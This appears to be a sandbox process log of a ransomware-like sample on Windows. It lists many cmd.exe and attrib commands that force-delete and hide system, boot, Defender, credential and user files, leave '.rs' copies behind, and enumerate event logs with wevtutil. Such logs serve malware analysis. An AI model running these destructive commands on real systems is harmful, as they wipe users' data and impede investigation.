C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ink\cs-CZ\tipresx.dll.mui""
3⤵
PID:17736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\microsoft shared\ink\cs-CZ\tipresx.dll.mui""
3⤵
PID:10756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms""
3⤵
PID:8572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms""
3⤵
PID:15160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\fr-FR\bootmgr.exe.mui""
3⤵
PID:17572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\fr-FR\bootmgr.exe.mui""
3⤵
PID:4528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\Branding\Basebrd\en-US\basebrd.dll.mui""
3⤵
PID:10820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\Branding\Basebrd\en-US\basebrd.dll.mui.rs""
3⤵
PID:19956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\60cdf0816278bf540dd5e4da46e7f979\Microsoft.Management.Infrastructure.Native.ni.dll""
3⤵
PID:14304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\60cdf0816278bf540dd5e4da46e7f979\Microsoft.Management.Infrastructure.Native.ni.dll.rs""
3⤵
PID:19296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\msadc\adcvbs.inc""
3⤵
PID:14632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\Fonts\chs_boot.ttf""
3⤵
PID:5480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\Microsoft.Ink.dll""
3⤵
PID:17448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\Microsoft.Ink.dll""
3⤵
PID:15496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\Fonts\chs_boot.ttf""
3⤵
PID:17508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui""
3⤵
PID:10404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui""
3⤵
PID:14912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\en-US\bfsvc.exe.mui""
3⤵
PID:17820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\en-US\bfsvc.exe.mui.rs""
3⤵
PID:9472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\02305155-8ac1-1189-ff55-b7119a53887c.xml""
3⤵
PID:17200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\02305155-8ac1-1189-ff55-b7119a53887c.xml""
3⤵
PID:20032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\fr-CA\bootmgr.exe.mui""
3⤵
PID:12124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\ado\msader15.dll""
3⤵
PID:10848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\fr-CA\bootmgr.exe.mui""
3⤵
PID:7484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\System\ado\msader15.dll""
3⤵
PID:5352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\pictures.ico""
3⤵
PID:19532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\cs-CZ\memtest.exe.mui""
3⤵
PID:12648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Public\Downloads\desktop.ini""
3⤵
PID:10664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edb00004.jtx""
3⤵
PID:21008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\es-ES\bootmgr.exe.mui""
3⤵
PID:7868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\System\msadc\adcvbs.inc""
3⤵
PID:14144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
3⤵
PID:14952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\MasterDatastore.xml""
3⤵
PID:16884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Internet Explorer\en-US\iexplore.exe.mui""
3⤵
PID:14708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\customizations.xml""
3⤵
PID:19624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files\Common Files\System\msadc\adcjavas.inc""
3⤵
PID:2088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\RunTime.xml""
3⤵
PID:11536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms""
3⤵
PID:18120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\RunTime\0__Power_Policy.provxml""
3⤵
PID:9264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\RunTime\1__Power_Controls.provxml""
3⤵
PID:20412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\RunTime.xml""
3⤵
PID:12612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\AppPatch\AcSpecfc.dll""
3⤵
PID:8816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\Prov\RunTime\1__Power_Policy.provxml""
3⤵
PID:4548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\GroupCompress.wma""
3⤵
PID:16564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Comments.aapp""
3⤵
PID:18416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe""
3⤵
PID:19964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\46654368bd35c0e1fe7626dcf05d45d9\Microsoft.PowerShell.ScheduledJob.ni.dll""
3⤵
PID:13616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\MasterDatastore.xml.rs""
3⤵
PID:10496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg""
3⤵
PID:12172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\pictures.ico""
3⤵
PID:5968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\ELAMBKUP\WdBoot.sys""
3⤵
PID:7504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edb00004.jtx""
3⤵
PID:16612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk""
3⤵
PID:11860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch""
3⤵
PID:11304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Windows\AppPatch\AcSpecfc.dll""
3⤵
PID:4968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.rs""
3⤵
PID:16264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef_extensions.pak""
3⤵
PID:5720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Public\Downloads\desktop.ini.rs""
3⤵
PID:19836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\customizations.xml.rs""
3⤵
PID:6360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg""
3⤵
PID:19200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\BitLockerDiscoveryVolumeContents\bg-BG_BitLockerToGo.exe.mui""
3⤵
PID:9280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\05\191""
3⤵
PID:5976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoMode.bat""
3⤵
PID:15920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml""
3⤵
PID:5380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\MasterDatastore.xml""
3⤵
PID:7544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\MasterDatastore.xml""
3⤵
PID:10200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.excelmui.msi.16.en-us.xml""
3⤵
PID:12428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.dcfmui.msi.16.en-us.xml""
3⤵
PID:9804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.dcfmui.msi.16.en-us.xml.rs""
3⤵
PID:10612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\RunTime\0__Power_Policy.provxml""
3⤵
PID:19840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Public\Desktop\Google Chrome.lnk""
3⤵
PID:18456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\RunTime\0__Power_Policy.provxml""
3⤵
PID:10256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\ec9bcefb68c5a44ec547660d5ba247f1\Microsoft.Management.Infrastructure.CimCmdlets.ni.dll.aux""
3⤵
PID:7164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
3⤵
PID:17048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\Cursors\aero_arrow_xl.cur""
3⤵
PID:7244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov""
3⤵
PID:2436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Garden.htm""
3⤵
PID:7436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\MasterDatastore.xml""
3⤵
PID:19976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
3⤵
PID:16144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Public\Pictures\desktop.ini""
3⤵
PID:20136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\Cursors\aero_arrow_l.cur""
3⤵
PID:17292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Default\GapaEngine.dll""
3⤵
PID:15728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\en-US\rtscom.dll.mui""
3⤵
PID:20000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_property.ico""
3⤵
PID:10920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\Provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\customizations.xml""
3⤵
PID:4972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Windows\BitLockerDiscoveryVolumeContents\bg-BG_BitLockerToGo.exe.mui""
3⤵
PID:16432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\1f1ad770f0b3c89cfed0fe2f69dcaaa6\Microsoft.PowerShell.Diagnostics.Activities.ni.dll""
3⤵
PID:8056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\normidna.nlp""
3⤵
PID:7128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Desktop\EnterSplit.wmv""
3⤵
PID:8044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\da-DK\memtest.exe.mui""
3⤵
PID:18936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\edbres00001.jrs""
3⤵
PID:6036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\User Account Pictures\user-192.png""
3⤵
PID:20404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Garden.htm""
3⤵
PID:8576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Public\Pictures\desktop.ini""
3⤵
PID:7984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Public\Videos\desktop.ini.rs""
3⤵
PID:10520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\MasterDatastore.xml""
3⤵
PID:15864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk""
3⤵
PID:10320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov""
3⤵
PID:19328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-core-timezone-l1-1-0.dll""
3⤵
PID:13624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\Ole DB\msdaosp.dll""
3⤵
PID:11868

C:\Windows\system32\wevtutil.exe
wevtutil.exe el
1⤵
PID:5316

C:\Windows\system32\wevtutil.exe
wevtutil.exe el
1⤵
PID:9868

C:\Windows\system32\attrib.exe
attrib +h "C:\$Recycle.Bin\S-1-5-21-1594587808-2047097707-2163810515-1000\desktop.ini.rs"
1⤵
PID:7848

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Public\Documents\desktop.ini"
2⤵
PID:16064

C:\Windows\system32\attrib.exe
attrib -h "C:\Boot\BCD.LOG1"
1⤵
PID:7796

C:\Windows\system32\attrib.exe
attrib -h "C:\$Recycle.Bin\S-1-5-21-1594587808-2047097707-2163810515-1000\desktop.ini"
1⤵
PID:6904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe el
1⤵
PID:2332

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\ClickToRun\DeploymentConfig.0.xml"
1⤵
PID:6944

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft OneDrive\setup\refcount.ini"
1⤵
PID:6344

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Windows\bcastdvr\broadcastpause720.h264"
1⤵
- Views/modifies file attributes
PID:7556

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\Favorites\desktop.ini.rs"
1⤵
PID:2284

C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Admin\Favorites\desktop.ini"
1⤵
PID:7968

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Admin\AppData\Local\IconCache.db"
1⤵
PID:11124

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Windows\assembly\NativeImages_v2.0.50727_32\indexb.dat"
1⤵
PID:12640

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
1⤵
- Views/modifies file attributes
PID:12996

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Admin\Contacts\desktop.ini"
1⤵
- Views/modifies file attributes
PID:12988

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
1⤵
- Views/modifies file attributes
PID:12912

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Oracle\Java\java.settings.cfg"
1⤵
PID:6928

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
1⤵
PID:10944

C:\Windows\system32\attrib.exe
attrib +h "C:\Windows\bfsvc.exe"
1⤵
PID:8436

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Default\NTUSER.DAT.LOG1.rs"
1⤵
- Views/modifies file attributes
PID:7496

C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Default\NTUSER.DAT.LOG1"
1⤵
PID:6388

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\desktop.ini"
1⤵
PID:1820

C:\Windows\system32\attrib.exe
attrib +h "C:\Boot\BCD.LOG2.rs"
1⤵
PID:16172

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\Links\desktop.ini"
1⤵
PID:14000

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Public\desktop.ini.rs"
1⤵
PID:5292

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Windows\Cursors\aero_arrow_l.cur"
2⤵
PID:18300

C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini"
1⤵
PID:14188

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini"
1⤵
PID:10900

C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Public\AccountPictures\desktop.ini"
1⤵
PID:12888

C:\Windows\system32\attrib.exe
attrib +h "C:\Windows\bcastdvr\broadcastpause720.h264"
1⤵
- Views/modifies file attributes
PID:5284

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json.bk"
1⤵
PID:8436

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Crypto\SystemKeys\12780705e4414c0ef1598a1e2c479c2e_cc51e87d-bda7-4ef7-80cf-c431fec6b805"
1⤵
PID:6064

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Public\AccountPictures\desktop.ini.rs"
1⤵
PID:996

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico"
1⤵
PID:8824

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
1⤵
PID:12412

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
1⤵
PID:18044

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Admin\Favorites\desktop.ini"
1⤵
PID:17636

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1E11E75149C17A93653DA7DC0B8CF53F_8F360D4ACE5D7CEC2FF3EF4F09601250"
1⤵
PID:11372

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini.rs"
1⤵
PID:12028

C:\Windows\system32\attrib.exe
attrib -h "C:\Windows\BitLockerDiscoveryVolumeContents\ar-SA_BitLockerToGo.exe.mui"
1⤵
PID:8560

C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Public\desktop.ini"
1⤵
PID:11872

C:\Windows\system32\attrib.exe
attrib +h "C:\Windows\BitLockerDiscoveryVolumeContents\ar-SA_BitLockerToGo.exe.mui.rs"
1⤵
PID:4664

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1E11E75149C17A93653DA7DC0B8CF53F_8F360D4ACE5D7CEC2FF3EF4F09601250"
1⤵
PID:9908

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D.rs"
1⤵
PID:11316

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Default\NTUSER.DAT.LOG1"
1⤵
PID:5728

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\customizations.xml"
1⤵
PID:18680

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\InkObj.dll"
1⤵
PID:18672

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Default\NTUSER.DAT.LOG2.rs"
1⤵
PID:18664

C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Default\NTUSER.DAT.LOG2"
1⤵
PID:18656

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files (x86)\Common Files\System\wab32.dll"
1⤵
- Views/modifies file attributes
PID:18648

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
1⤵
PID:5360

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico"
1⤵
PID:7828

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Windows\Branding\ShellBrd\shellbrd.dll"
1⤵
PID:13980

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Windows\appcompat\Programs\Amcache.hve.LOG2"
1⤵
PID:11740

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\7F90D34A-6846-4B37-9E6C-DA49ECC4DACB\mergedVirtualRegistry.dat"
1⤵
- Views/modifies file attributes
PID:11896

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\All Users\Microsoft\Network\Downloader\edb.chk"
1⤵
PID:12760

C:\Windows\system32\attrib.exe
attrib -h "C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf"
1⤵
PID:17664

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Default\NTUSER.DAT.LOG2"
1⤵
PID:16464

C:\Windows\system32\attrib.exe
attrib +h "C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf.rs"
1⤵
PID:11252

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\edb.jtx"
1⤵
PID:18640

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\InkObj.dll"
1⤵
PID:8536

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files (x86)\Common Files\System\Ole DB\msdadc.dll"
1⤵
PID:17760

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\Microsoft.Build.Conversion.v3.5.dll"
1⤵
PID:11876

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
1⤵
- Views/modifies file attributes
PID:18944

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\Desktop\desktop.ini"
